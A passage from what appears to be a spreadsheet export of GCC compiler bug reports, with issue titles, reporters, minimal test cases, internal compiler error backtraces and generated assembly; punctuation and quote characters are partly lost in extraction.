	../../gcc-git/gcc/cp/constexpr.c:3340
0x7fe63e cxx_eval_binary_expression
	../../gcc-git/gcc/cp/constexpr.c:1601
0x7fa994 cxx_eval_constant_expression
	../../gcc-git/gcc/cp/constexpr.c:3462
0x7fff0b cxx_eval_outermost_constant_expr
	../../gcc-git/gcc/cp/constexpr.c:3746
0x801980 maybe_constant_value(tree_node* tree_node*)
	../../gcc-git/gcc/cp/constexpr.c:3859
0x772f15 finish_static_assert(tree_node* tree_node* unsigned int bool)
	../../gcc-git/gcc/cp/semantics.c:8291
0x6f47a2 cp_parser_static_assert
	../../gcc-git/gcc/cp/parser.c:12662
0x70b099 cp_parser_block_declaration
	../../gcc-git/gcc/cp/parser.c:11880
0x70bed1 cp_parser_declaration_statement
	../../gcc-git/gcc/cp/parser.c:11496
0x70804a cp_parser_statement
	../../gcc-git/gcc/cp/parser.c:10162
0x708971 cp_parser_statement_seq_opt
	../../gcc-git/gcc/cp/parser.c:10440
0x708a73 cp_parser_compound_statement
	../../gcc-git/gcc/cp/parser.c:10394
0x708c00 cp_parser_function_body
	../../gcc-git/gcc/cp/parser.c:20216
0x708c00 cp_parser_ctor_initializer_opt_and_function_body
	../../gcc-git/gcc/cp/parser.c:20252
0x709929 cp_parser_function_definition_after_declarator
	../../gcc-git/gcc/cp/parser.c:24856
0x70a82b cp_parser_function_definition_from_specifiers_and_declarator
	../../gcc-git/gcc/cp/parser.c:24768
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
GCC 5.1 and earlier emit a diagnostic instead:
$ g++-5.1 -std=c++11 -c ice.cc
ice.cc: In function â€˜void f()â€™:
ice.cc:6:5: error: non-constant condition for static assertion
     static_assert(*(p-1) == 'h' )
     ^
ice.cc:6:5: error: array subscript out of bound
Kind regards</t>
  </si>
  <si>
    <t>rofirrim</t>
  </si>
  <si>
    <t>GCC-61685</t>
  </si>
  <si>
    <t>Strange check in bid128_fma.c - rounding_correction()</t>
  </si>
  <si>
    <t>bid128_fma.c 97
if (is_midpoint_lt_even || is_midpoint_lt_even ||     // &lt;===
    is_inexact_gt_midpoint || is_inexact_gt_midpoint) // &lt;===
*ptrfpsf |= UNDERFLOW_EXCEPTION</t>
  </si>
  <si>
    <t>maksqwe1</t>
  </si>
  <si>
    <t>GCC-38183</t>
  </si>
  <si>
    <t>Useless move to memory when passing small structs to functions</t>
  </si>
  <si>
    <t>Consider the following:
  struct s { double x double y }
  double f(struct s s) { return s.x + s.y }
When compiled with optimisation this generates:
  f:
          movsd   %xmm1 -8(%rsp)
          addsd   %xmm1 %xmm0
          ret
What is the movsd doing here ?</t>
  </si>
  <si>
    <t>GCC-28260</t>
  </si>
  <si>
    <t>ICE with incompatible friend declaration</t>
  </si>
  <si>
    <t>The following invalid testcase triggers an ICE since at least GCC 2.95.3:
=========================================
template struct A
{
  friend int foo()
}
void foo() { A a }
=========================================
bug.cc: In instantiation of 'A':
bug.cc:6:   instantiated from here
bug.cc:3: error: new declaration 'int foo()'
bug.cc:6: error: ambiguates old declaration 'void foo()'
bug.cc: In function 'int foo()':
bug.cc:6: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-33665</t>
  </si>
  <si>
    <t>[4.2 regression] Bogus warning: `this.0' is used uninitialized in this function</t>
  </si>
  <si>
    <t>Experienced with 4.1.1 4.1.2 and 4.2.1.  Below is the minimum test case that I can narrow it down to while being reproducible across these versions.
$ g++ -O3 -Wall test.cpp -o test
test.cpp: In function â€˜int main()â€™:
test.cpp:19: warning: â€˜this.11â€™ is used uninitialized in this function
test.cpp:19: note: â€˜this.11â€™ was declared here
ws004:/tmp$ 
---
struct base1
{
    int function() { return 1 }
}
struct base2 : public base1
{
    double val1
    double val2
}
struct myclass : public base2
{
public:
    int x
    myclass()
    {
        x = this-&gt;function()
    }
}
static myclass init_instance()
{
    return myclass()
}
struct test_harness
{
    const myclass instance
    test_harness() : instance(init_instance())
    {
    }
    int result()
    {
        return instance.x
    }
}
int main(void)
{
    test_harness x
    return x.result()
}</t>
  </si>
  <si>
    <t>matthewc</t>
  </si>
  <si>
    <t>GCC-62041</t>
  </si>
  <si>
    <t>vector fneg codegen uses a subtract instead of an xor (x86-64)</t>
  </si>
  <si>
    <t>$ cat fneg.c
#include 
__m128 fneg4(__m128 x) {
	return _mm_sub_ps(_mm_set1_ps(-0.0) x)
}
$ ~gcc49/local/bin/gcc -march=core-avx2 -O2 -S fneg.c -o - 
...
_fneg4:
LFB513:
	vmovaps	LC0(%rip) %xmm1
	vsubps	%xmm0 %xmm1 %xmm0
	ret
...
LC0:
	.long	2147483648
	.long	2147483648
	.long	2147483648
	.long	2147483648
------------------------------------
Instead of generating 'vsubps' here it would be better to generate 'vxorps' because we know we're just flipping the sign bit of each element. This is what gcc does for the scalar version of this code.
Note that there is no difference if I use -ffast-math with this testcase. With -ffast-math enabled we should generate the same 'xorps' code even if the -0.0 is +0.0. Again that's what the scalar codegen does so I think this is just a deficiency when generating vector code.
I can file the -ffast-math case as a separate bug if that would be better.</t>
  </si>
  <si>
    <t>spatel</t>
  </si>
  <si>
    <t>GCC-29343</t>
  </si>
  <si>
    <t>(Regression) Error on valid specification variables in same call to ALLOCATE</t>
  </si>
  <si>
    <t>See: 
http://gcc.gnu.org/ml/fortran/2006-10/msg00086.html
Hi!
This patch causes compilation failure on SPEC cpu2000/facerec.
Below is the minimal reproducer:
        Subroutine ReadParameters (Album)
        Implicit NONE
        Type GalleryP
                Integer       :: NoOfEntries
                Character(80) Pointer :: FileName (:)
        End Type GalleryP
        Type(GalleryP) Intent(Out) :: Album
        Allocate (Album%FileName   (Album%NoOfEntries))
        end
Error message:
 In file small2.f90:10
Allocate (Album%FileName (Album%NoOfEntries))
1
Error: 'album' must not appear an the array specification at (1) in the same ALLOCATE statement where it is itself allocated
This is caused by my patch for PR20779 and PR20891 which was just submitted.
Thanks
Paul</t>
  </si>
  <si>
    <t>GCC-19261</t>
  </si>
  <si>
    <t>continuation character illegal as first non-blank character in statement</t>
  </si>
  <si>
    <t>$ cat continuation-2.f90
 &amp;
end
$ gfortran continuation-2.f90
$ cat continuation-3.f90
 &amp;
end
$ gfortran continuation-3.f90
$ gfortran -v
Using built-in specs.
Configured with: ../gcc-4.0-20050102/configure --prefix=/home/zfkts
--enable-languages=cc++f95
Thread model: posix
gcc version 4.0.0 20050102 (experimental)
$ gfortran -dumpmachine
ia64-unknown-linux-gnu
Both programs above have the same syntax error: starting a
statement with &amp; is illegal.</t>
  </si>
  <si>
    <t>GCC-6099</t>
  </si>
  <si>
    <t>sparc-sun-solaris2.7 gcc-3.1 RTL checking failure on compile/20000326-2.c</t>
  </si>
  <si>
    <t>These:
FAIL: gcc.c-torture/compile/20000326-2.c  -O1
FAIL: gcc.c-torture/compile/20000326-2.c  -O2
FAIL: gcc.c-torture/compile/20000326-2.c  -O3 -fomit-frame-pointer
FAIL: gcc.c-torture/compile/20000326-2.c  -O3 -g
FAIL: gcc.c-torture/compile/20000326-2.c  -Os
are RTL checking failures.  Here's an example:
 &gt; compile/20000326-2.c: In function `foo':
 &gt; compile/20000326-2.c:9: RTL check: expected code `code_label' have `note' in emit_delay_sequence at reorg.c:514
Release:
gcc version 3.1 20020328 (prerelease)
Environment:
sparc-sun-solaris2.7 native as/ld
How-To-Repeat:
configure with --enable-checking=misctreertlgc on solaris2.7 bootstrap and run make check</t>
  </si>
  <si>
    <t>GCC-54815</t>
  </si>
  <si>
    <t>[avr] missed optimization with operations with constant operands</t>
  </si>
  <si>
    <t>Created attachment 28359
mov.c: C test case
== C code ==
void f (int int)
void f_and (int x)
{
    f (x x 
}
void f_or (int x)
{
    f (x x | 42)
}
void f_xor (int x)
{
    f (x x ^ 0x80)
}
== Compile with ==
$ avr-gcc mov.c -S -Os -mmcu=atmega8 -dp
The result is 
f_or:
	ldi r22lo8(42)	   15	*movhi/5	[length = 2]
	ldi r230
	or r22r24	   6	iorhi3/1	[length = 2]
	or r23r25
	rjmp f
but the code could MOVW first to the destination and the IOR instead of loading the target with the const and then IOR against the source:
f_or:
	movw r22r24    *movhi	[length = 1]
	ori r22lo8(42)	   iorhi3	[length = 1]
	rjmp f
Similar for the other test functions.</t>
  </si>
  <si>
    <t>GCC-47840</t>
  </si>
  <si>
    <t>[4.4/4.5/4.6 Regression] incorrect _mm256_insert_epi{3264} implementations</t>
  </si>
  <si>
    <t>see avxintrin.h:
_mm256_insert_epi32 and _mm256_insert_epi64 use _mm_insert_epi16 internally
if __OPTIMIZE__ is not defined they use _mm_insert_epi32/64 internally - as I would have expected.
I also checked 4.5 and 4.4 and it seems the bug was not noticed in any branch yet.</t>
  </si>
  <si>
    <t>GCC-18776</t>
  </si>
  <si>
    <t>[4.0 Regression] Libgfortran doesn't build again</t>
  </si>
  <si>
    <t>The error message is:
/opt/build/eric/gcc/gcc/xgcc -B/opt/build/eric/gcc/gcc/
-B/opt/build/eric/local/gcc-4.0/sparc64-sun-solaris2.9/bin/
-B/opt/build/eric/local/gcc-4.0/sparc64-sun-solaris2.9/lib/ -isystem
/opt/build/eric/local/gcc-4.0/sparc64-sun-solaris2.9/include -isystem
/opt/build/eric/local/gcc-4.0/sparc64-sun-solaris2.9/sys-include -DHAVE_CONFIG_H
-I. -I/home/eric/cvs/gcc/libgfortran -I.
-iquote/home/eric/cvs/gcc/libgfortran/io -O2 -g -O2 -std=gnu99 -O2 -g -O2 -c
/home/eric/cvs/gcc/libgfortran/generated/dotprod_c4.c  -fPIC -DPIC -o
.libs/dotprod_c4.o
In file included from /home/eric/cvs/gcc/libgfortran/generated/dotprod_c4.c:26:
/home/eric/cvs/gcc/libgfortran/libgfortran.h: In function 'isfinite':
/home/eric/cvs/gcc/libgfortran/libgfortran.h:96: warning: implicit declaration
of function 'finite'
/home/eric/cvs/gcc/libgfortran/generated/dotprod_c4.c: In function
'__dot_product_c4':
/home/eric/cvs/gcc/libgfortran/generated/dotprod_c4.c:66: fatal error: internal
consistency failure
compilation terminated.
gmake[3]: *** [dotprod_c4.lo] Error 1
gmake[3]: Leaving directory `/opt/build/eric/gcc/sparc64-sun-solaris2.9/libgfortran'
gmake[2]: *** [all] Error 2
gmake[2]: Leaving directory `/opt/build/eric/gcc/sparc64-sun-solaris2.9/libgfortran'
gmake[1]: *** [all-target-libgfortran] Error 2
gmake[1]: Leaving directory `/opt/build/eric/gcc'
gmake: *** [bootstrap] Error 2
Given that it builds in 32-bit mode and on x86-64 I'm leaning towards another
miscompilation of the Fortran compiler.</t>
  </si>
  <si>
    <t>CLASSPATH-23865</t>
  </si>
  <si>
    <t>multiple JProgressBar components are not updated correctly</t>
  </si>
  <si>
    <t>I have written a test application for the JProgressBar and realized that only
one of four is updated correctly (there are drawing errors as well but for that
I file another bug).</t>
  </si>
  <si>
    <t>GCC-42051</t>
  </si>
  <si>
    <t>[OOP] ICE on array-valued function with CLASS formal argument</t>
  </si>
  <si>
    <t>Gfortran 4.5.0 20091106 (with Janus's patch for PR42048) produces the following on the code below:
gfortran -c field_grid.f03 
field_grid.f03: In function â€˜outputâ€™:
field_grid.f03:27:0: internal compiler error: in gfc_conv_variable at fortran/trans-expr.c:550
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
module grid_module
  implicit none 
  type grid
    real dimension(1) :: x=1.
  contains
    procedure :: return_x
  end type 
contains
  function return_x(this) result(this_x)
    class(grid) intent(in) :: this
    real  dimension(1) :: this_x
    this_x = this%x
  end function
end module 
module field_module
  use grid_module only : grid 
  implicit none 
  type field
    type(grid) :: mesh
  contains
    procedure :: output
  end type 
contains
  subroutine output(this)
    class(field) intent(in) :: this
    real dimension(:) allocatable :: x
    x=this%mesh%return_x()
  end subroutine
end module</t>
  </si>
  <si>
    <t>GCC-80237</t>
  </si>
  <si>
    <t>float to double conversion is not optimized away</t>
  </si>
  <si>
    <t>i get suboptimal code for
__attribute__((noinline))
static float f(float x)
{
  return x*x
}
static double g(float x)
{
  return x&gt;0 ? f(x) : x+1.0
}
float foo(float x)
{
  return g(x)
}
i expected a tail call because for float x (float)(double)x conversion is a nop but with -O3 i get
f:
        mulss   %xmm0 %xmm0
        ret
foo:
        ucomiss .LC0(%rip) %xmm0
        jbe     .L8
        call    f     ///////////////// why not tail call?
        cvtss2sd        %xmm0 %xmm0
        cvtsd2ss        %xmm0 %xmm0
        ret
.L8:
        cvtss2sd        %xmm0 %xmm0
        addsd   .LC1(%rip) %xmm0
        cvtsd2ss        %xmm0 %xmm0
        ret
.LC0:
        .long   0
.LC1:
        .long   0
        .long   1072693248</t>
  </si>
  <si>
    <t>GCC-25075</t>
  </si>
  <si>
    <t>[4.1 only] array size mismatch in DOT_PRODUCT</t>
  </si>
  <si>
    <t>using GNU Fortran 95 (GCC) 4.1.0 20051126 (prerelease)  with '-g -pedantic -std=f95' I get a bad / no diagnostic for the following invalid code:
INTEGER :: I(10)J(11)
write(6*) DOT_PRODUCT(IJ)
END</t>
  </si>
  <si>
    <t>GCC-80993</t>
  </si>
  <si>
    <t>[msp430] __attribute__((interrupt)) should imply __attribute__((used))</t>
  </si>
  <si>
    <t>Enabling link-time optimization on the MSP430 causes any interrupt handlers which are not called directly to be cheerfully eaten. Thus any interrupt causes the processor to execute essentially random data resulting in uncontrolled jumps and general badness. This problem can be resolved with __attribute__((used)) which should be implied by __attribute__((interrupt)).</t>
  </si>
  <si>
    <t>awygle</t>
  </si>
  <si>
    <t>GCC-81843</t>
  </si>
  <si>
    <t>[8 Regression] ICE on valid C++11 code with variadic templates: in tsubst_pack_expansion at cp/pt.c:11524</t>
  </si>
  <si>
    <t>$ g++-trunk -v  
Using built-in specs.
COLLECT_GCC=g++-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/8.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 8.0.0 20170814 (experimental) [trunk revision 251096] (GCC) 
$ 
$ g++-6.2 -c -std=c++11 small.cpp
$ clang++-4.0.0 -c -std=c++11 small.cpp
$ icc -c -std=c++11 small.cpp
$ 
$ g++-trunk -c -std=c++11 small.cpp
small.cpp: In instantiation of â€˜struct C::D &gt; &gt;â€™:
small.cpp:9:34:   required from here
small.cpp:5:34: internal compiler error: in tsubst_pack_expansion at cp/pt.c:11524
   template  struct D {}
                                  ^
0x863095 tsubst_pack_expansion(tree_node* tree_node* int tree_node*)
	../../gcc-source-trunk/gcc/cp/pt.c:11524
0x863a1a tsubst_template_args
	../../gcc-source-trunk/gcc/cp/pt.c:11749
0x8638b1 tsubst_template_args
	../../gcc-source-trunk/gcc/cp/pt.c:11768
0x864064 tsubst_aggr_type
	../../gcc-source-trunk/gcc/cp/pt.c:11981
0x864195 tsubst_aggr_type
	../../gcc-source-trunk/gcc/cp/pt.c:11965
0x85d9cd tsubst_decl
	../../gcc-source-trunk/gcc/cp/pt.c:12809
0x865f56 tsubst(tree_node* tree_node* int tree_node*)
	../../gcc-source-trunk/gcc/cp/pt.c:13389
0x893aa6 instantiate_class_template_1
	../../gcc-source-trunk/gcc/cp/pt.c:10608
0x893aa6 instantiate_class_template(tree_node*)
	../../gcc-source-trunk/gcc/cp/pt.c:10892
0x8ee9a2 complete_type(tree_node*)
	../../gcc-source-trunk/gcc/cp/typeck.c:136
0x7375c7 start_decl_1(tree_node* bool)
	../../gcc-source-trunk/gcc/cp/decl.c:5128
0x75e228 start_decl(cp_declarator const* cp_decl_specifier_seq* int tree_node* tree_node* tree_node**)
	../../gcc-source-trunk/gcc/cp/decl.c:5091
0x81ef30 cp_parser_init_declarator
	../../gcc-source-trunk/gcc/cp/parser.c:19543
0x821d6f cp_parser_simple_declaration
	../../gcc-source-trunk/gcc/cp/parser.c:13059
0x822c3a cp_parser_block_declaration
	../../gcc-source-trunk/gcc/cp/parser.c:12877
0x82af34 cp_parser_declaration
	../../gcc-source-trunk/gcc/cp/parser.c:12774
0x829936 cp_parser_declaration_seq_opt
	../../gcc-source-trunk/gcc/cp/parser.c:12650
0x829c54 cp_parser_translation_unit
	../../gcc-source-trunk/gcc/cp/parser.c:4387
0x829c54 c_parse_file()
	../../gcc-source-trunk/gcc/cp/parser.c:38894
0x971f55 c_common_parse_file()
	../../gcc-source-trunk/gcc/c-family/c-opts.c:1106
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
-----------------------------------------------------------------
template  struct A
template  struct B
template  struct C
{
  template  struct D {}
  template  struct D  ... &gt; &gt;
}
C ::D  &gt; &gt; c</t>
  </si>
  <si>
    <t>GCC-46383</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: in get_binfo_at_offset at tree.c:10947</t>
  </si>
  <si>
    <t>Created attachment 22338
testcase
The attached C++ code compiles without optimization or with -O1 but not -O2:
bug.cpp:250:1: internal compiler error: in get_binfo_at_offset at tree.c:10947
component chosen randomly as usual.</t>
  </si>
  <si>
    <t>GCC-52803</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE: in ira at ira.c:3616 with -fno-move-loop-invariants on almost any code</t>
  </si>
  <si>
    <t>===== testcase.c =====
void foo (void) {}
======================
Compiler output:
$ gcc -O -fno-move-loop-invariants testcase.c
testcase.c: In function 'foo':
testcase.c:1:1: internal compiler error: in ira at ira.c:3616
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r186030 - crash
r185937 - crash
4.7 r185191 - OK</t>
  </si>
  <si>
    <t>GCC-47044</t>
  </si>
  <si>
    <t>bootstrap comparison failure when -O2 defaults on -fgraphite-identity and --enable-build-with-cxx</t>
  </si>
  <si>
    <t>On x86_64-apple-darwin10 at r168176 with...
Index: gcc/opts.c
===================================================================
--- gcc/opts.c    (revision 168176)
+++ gcc/opts.c    (working copy)
@@ -4586 +4589 @@
     { OPT_LEVELS_1_PLUS OPT_fcombine_stack_adjustments NULL 1 }
     /* -O2 optimizations.  */
+#ifdef HAVE_cloog
+    { OPT_LEVELS_2_PLUS OPT_fgraphite_identity NULL 1 }
+#endif
     { OPT_LEVELS_2_PLUS OPT_finline_small_functions NULL 1 }
     { OPT_LEVELS_2_PLUS OPT_findirect_inlining NULL 1 }
     { OPT_LEVELS_2_PLUS OPT_fpartial_inlining NULL 1 }
applied to default on -fgraphite-identity at -O2 a bootstrap comparison failure occurs...
Comparing stages 2 and 3
warning: gcc/cc1-checksum.o differs
warning: gcc/cc1obj-checksum.o differs
warning: gcc/cc1objplus-checksum.o differs
warning: gcc/cc1plus-checksum.o differs
Bootstrap comparison failure!
gcc/alias.o differs
gcc/attribs.o differs
gcc/bb-reorder.o differs
gcc/bitmap.o differs
gcc/bt-load.o differs
gcc/build/genattrtab.o differs
gcc/build/genautomata.o differs
gcc/build/genflags.o differs
gcc/build/gengenrtl.o differs
gcc/build/gengtype-lex.o differs
gcc/build/gengtype-state.o differs
...
This problem did not occur at r167670.
http://gcc.gnu.org/ml/gcc-testresults/2010-12/msg00852.html
../gcc-4.6-20101222/configure --prefix=/sw --prefix=/sw/lib/gcc4.6 --mandir=/sw/share/man --infodir=/sw/lib/gcc4.6/info --enable-languages=cc++fortranobjcobj-c++java --with-gmp=/sw --with-libiconv-prefix=/sw --with-ppl=/sw --with-cloog=/sw --with-mpc=/sw --with-system-zlib --x-includes=/usr/X11R6/include --x-libraries=/usr/X11R6/lib --program-suffix=-fsf-4.6 --enable-checking=yes --enable-cloog-backend=isl --enable-build-with-cxx</t>
  </si>
  <si>
    <t>GCC-34010</t>
  </si>
  <si>
    <t>[4.9 Regression] ppc64 bad stdargs codegen for zero sized objects</t>
  </si>
  <si>
    <t>The fix for http://gcc.gnu.org/bugzilla/show_bug.cgi?id=24306 breaks -m64 struct-layout-1.c.
It breaks the abi of every target which is wrong.  On ppc -m64 it results in a self inconsistent abi.
This correct fix would be to modify ix86_function_arg_boundary function to give PARM_BOUNDARY for zero sized objects.</t>
  </si>
  <si>
    <t>GCC-57574</t>
  </si>
  <si>
    <t>-std=c99 inline function incorrectly has external linkage with prior static declaration</t>
  </si>
  <si>
    <t>gcc emits incorrect warning for inline function with internal linkage:
$ cat example.c
static int n
static inline int f(void)
inline int f(void) {return n}
int g(){return f()}
$ gcc-4.8 -std=c99 -c example.c 
example.c:3:28: warning: 'n' is static but used in inline function 'f' which is not static [enabled by default]
 inline int f(void) {return n}
                            ^
$ nm example.o
         U f
00000000 T g
00000000 b n
according to C99 6.2.2p4 the linkage of an identifier
is determined by the prior declaration
(internal in this case inline does not change that)
referencing static objects from an inline definition
only violates the constraint in C99 6.7.4p3 if the
function has external linkage
(so the diagnostic is unjustified)
it seems from the warning that gcc thinks that f
is not static this can break code:
the inline definition of f does not provide an
external definition and if the compiler choose
not to inline then the code has undefined f symbol
if the compiler thinks f has external linkage
(as demonstrated by nm above)</t>
  </si>
  <si>
    <t>nszabolcs</t>
  </si>
  <si>
    <t>GCC-80014</t>
  </si>
  <si>
    <t>[6/7/8 Regression] Caret missing in error message</t>
  </si>
  <si>
    <t>The caret is missing in the error message for testcase
gcc/testsuite/g++.dg/rtti/typeid6.C
since GCC 6.1.0:
gcc-6-branch:
typeid6.C: In function 'void foo()':
typeid6.C:10:3: error: no match for 'operator!' (operand type is 'const std::type_info')
   !typeid(void) // { dg-error !typeid\\(void\\)|candidate is }
typeid6.C:10:3: note: candidate: operator!(bool) 
typeid6.C:10:3: note:   no known conversion for argument 1 from 'const std::type_info' to 'bool'
trunk:
typeid6.C: In function 'void foo()':
typeid6.C:10:3: error: no match for 'operator!' (operand type is 'const std::type_info')
   !typeid(void) // { dg-error !typeid\\(void\\)|candidate is }
typeid6.C:10:3: note: candidate: operator!(bool) 
typeid6.C:10:3: note:   no known conversion for argument 1 from 'const std::type_info' to 'bool'
Note that the location information is at least partially available since the
line and column number in the error message are correct.</t>
  </si>
  <si>
    <t>GCC-17520</t>
  </si>
  <si>
    <t>[4.0 regression] Huge compile time for C code</t>
  </si>
  <si>
    <t>Compiling the attached file with GCC 4.0.0 as of 04-09-15 takes over 70 
seconds compared to 0.6 seconds with 3.4.2. It also needs over 250MB of RAM. 
Appended is the output of gcc -v -ftime-report -O2 -c slow.c -save-temps. 
Reading specs from /usr/local/gcc-3.5/lib/gcc/i686-pc-linux-gnu/4.0.0/specs 
Configured with: ../gcc/configure --disable-checking --enable-languages=c 
--prefix=/usr/local/gcc-3.5 
Thread model: posix 
gcc version 4.0.0 20040915 (experimental) 
 /usr/local/gcc-3.5/libexec/gcc/i686-pc-linux-gnu/4.0.0/cc1 -E -quiet -v slow.c 
-mtune=pentiumpro -ftime-report -O2 -fpch-preprocess -o slow.i 
ignoring nonexistent directory 
/usr/local/gcc-3.5/lib/gcc/i686-pc-linux-gnu/4.0.0/../../../../i686-pc-linux-gnu/include 
#include ... search starts here: 
#include  search starts here: 
 /usr/local/include 
 /usr/local/gcc-3.5/include 
 /usr/local/gcc-3.5/lib/gcc/i686-pc-linux-gnu/4.0.0/include 
 /usr/include 
End of search list. 
Execution times (seconds) 
 TOTAL                 :   0.00             0.00             0.01 
 /usr/local/gcc-3.5/libexec/gcc/i686-pc-linux-gnu/4.0.0/cc1 -fpreprocessed 
slow.i -quiet -dumpbase slow.c -mtune=pentiumpro -auxbase slow -O2 -version 
-ftime-report -o slow.s 
GNU C version 4.0.0 20040915 (experimental) (i686-pc-linux-gnu) 
        compiled by GNU C version 4.0.0 20040915 (experimental). 
GGC heuristics: --param ggc-min-expand=64 --param ggc-min-heapsize=64421 
Execution times (seconds) 
 garbage collection    :   0.03 ( 0%) usr   0.00 ( 0%) sys   0.24 ( 0%) wall 
 life analysis         :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall 
 tree gimplify         :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall 
 tree CFG construction :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall 
 dominator optimization:   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall 
 tree PRE              :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall 
 tree DSE              :   0.02 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall 
 tree iv optimization  :  42.78 (58%) usr   0.28 (42%) sys  47.96 (58%) wall 
 expand                :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall 
 loop analysis         :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall 
 CPROP 1               :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall 
 CPROP 2               :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall 
 CSE 2                 :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall 
 branch prediction     :  30.59 (42%) usr   0.39 (58%) sys  33.79 (41%) wall 
 local alloc           :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall 
 peephole 2            :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall 
 rename registers      :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall 
 TOTAL                 :  73.50             0.67            82.10 
 as -V -Qy -o slow.o slow.s 
GNU assembler version 2.15.90.0.1.1 (i586-suse-linux) using BFD version 
2.15.90.0.1.1 20040303 (SuSE Linux)</t>
  </si>
  <si>
    <t>GCC-49015</t>
  </si>
  <si>
    <t>[C++0x] Non-defining constexpr function declarations require complete argument/return types</t>
  </si>
  <si>
    <t>After successful resolution of bug 48948 gcc 4.7.0 20110514 (experimental) in C++0x mode now rejects the following code at the lines marked with #L-4 until #L-13:
//---
class A
class B
constexpr B f(A) // #L-4
class B {
  friend constexpr B g(A) // #L-7
}
class A {}
constexpr B f(A) { return B() } // #L-12
constexpr B g(A) { return B() } // #L-13
//---
4|error: invalid type for parameter 1 of constexpr function 'constexpr B f(A)'|
4|error: invalid return type 'B' of constexpr function 'constexpr B f(A)'|
7|error: invalid type for parameter 1 of constexpr function 'constexpr B g(A)'|
7|error: invalid type for parameter 1 of constexpr function 'constexpr B g(A)'|
|In function 'constexpr B f(A)':|
12|error: redeclaration 'constexpr B f(A)' differs in 'constexpr'|
4|error: from previous declaration 'B f(A)'|
|In function 'constexpr B g(A)':|
13|error: redeclaration 'constexpr B g(A)' differs in 'constexpr'|
7|error: from previous declaration 'B g(A)'|
||=== Build finished: 8 errors 0 warnings ===|
The parts following line 8 have mainly be added to demonstrate the general usefulness of the non-defining declarations and the error described by #L-12 and #L-13 is possibly overlaid by bug 48945 as well so the main aspect of this issue are the #L-4 and #L-7 rejections if interaction with bug 48945 is the cause of #L-12 and #L-13.
I don't think that the literal-type requirements as of 3.9 p. 10 impose the requirements of complete types for the non-defining declarations of these constexpr functions IMO the requirement for the complete type is only required for the final definition of f and g which also seems to be intended as described by the example of 7.1.5 p. 1. In principle these examples are also not much different from constexpr function templates which must delay the evaluation until the concrete instantiation and usage (The last aspect becomes clear by the 7.1.5 p. 1 example and demonstrates that this is a general character of constexpr functions irrespective of templates).</t>
  </si>
  <si>
    <t>GCC-37913</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE: Segmentation fault in link_block cfg.c:153</t>
  </si>
  <si>
    <t>mhx@r2d2 $ gcc -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc-4.4-20081024/configure --program-suffix=-4.4 --prefix=/home/mhx/gcc/gcc-4.4-20081024 --enable-languages=cc++ --disable-nls
Thread model: posix
gcc version 4.4.0 20081024 (experimental) (GCC) 
mhx@r2d2 $ gcc -c test.i
mhx@r2d2 $ gcc -O2 -c test.i
IO.c: In function 'XS_IO__Handle_setvbuf':
IO.c:835: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>mhx-perl</t>
  </si>
  <si>
    <t>GCC-54536</t>
  </si>
  <si>
    <t>[avr]: incorrect crt with -mmcu=at90usb1287</t>
  </si>
  <si>
    <t>The avr-gcc driver is linking against crtusb1286.o when using the mcu option
-mmcu=at90usb1287. It should use crtusb1287.o instead.
Since crtusb1286.o and crtusb1287.o are identical this is ok for the default 
avr-libc multilib setup but causes problems with non-standard build systems
(e.g. device specific builds).</t>
  </si>
  <si>
    <t>michael.schaenzler</t>
  </si>
  <si>
    <t>GCC-21573</t>
  </si>
  <si>
    <t>'Valid attribute on enumeration types with holes</t>
  </si>
  <si>
    <t>The program below is expected to print SUCCESS (because 0 is not a valid value
of type T).  However at optimization level -O2 (on i686-pc-linux-gnu) it
prints FAIL.
with Ada.Unchecked_Conversion
with Ada.Text_IO use Ada.Text_IO
procedure Valid_Enumeration_Holes is
   type T is (A B C D)
   for T'Size use 8
   for T use (A =&gt; 2 B =&gt; 3 C =&gt; 5 D =&gt; 7)
   type N is mod 2**8
   function Convert is new Ada.Unchecked_Conversion (N T)
begin
   if Convert (N'Value (0))'Valid then
      Put_Line (FAIL)
   else
      Put_Line (SUCCESS)
   end if
end Valid_Enumeration_Holes</t>
  </si>
  <si>
    <t>GCC-34493</t>
  </si>
  <si>
    <t>[4.2 Regression] ICE reload_cse_simplify_operands at postreload.c:392 on powerpc with -funroll-loops</t>
  </si>
  <si>
    <t>[ Forwarded from http://bugs.debian.org/452811 ]
We're seeing the following ICE with 4.2/4.3 and -funroll-loops:
/home/tbm/14406.c: In function 'fp_mul_comba_small':
/home/tbm/14406.c:2073: error: insn does not satisfy its constraints:
(insn 30288 1486 1488 11 (set (mem/c:DI (plus:SI (reg/f:SI 1 1)
